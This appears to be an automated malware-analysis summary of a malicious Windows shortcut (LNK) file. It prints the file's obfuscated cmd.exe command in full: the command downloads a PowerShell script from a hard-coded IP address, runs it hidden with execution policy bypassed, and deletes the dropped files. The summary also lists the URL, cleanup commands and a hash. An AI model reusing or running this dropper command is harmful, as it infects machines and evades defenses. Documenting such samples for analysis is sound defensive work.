Summary by MalvaGPT
Characteristics
Artefacts
Name
Value
LNK: Command Execution

cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://178.16.53.53/Sohomon8200/moaningstring.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\9qI2q2.ps1",2 > %TEMP%\cB.vbs && cscript //b %TEMP%\cB.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\9qI2q2.ps1 && del %TEMP%\cB.vbs %TEMP%\9qI2q2.ps1"

URLs in VB Code - #1

http://178.16.53.53/Sohomon8200/moaningstring.ps1

Deobfuscated PowerShell

Remove-Item "%TEMP%\cB.vbs" "%TEMP%\9qI2q2.ps1 IconLocation: imageres.dll"

Deobfuscated PowerShell

Remove-Item "%TEMP%\cB.vbs" "%TEMP%\9qI2q2.ps1"

7754077ee9191839a971e99d38e9dc1a (85.07 KB)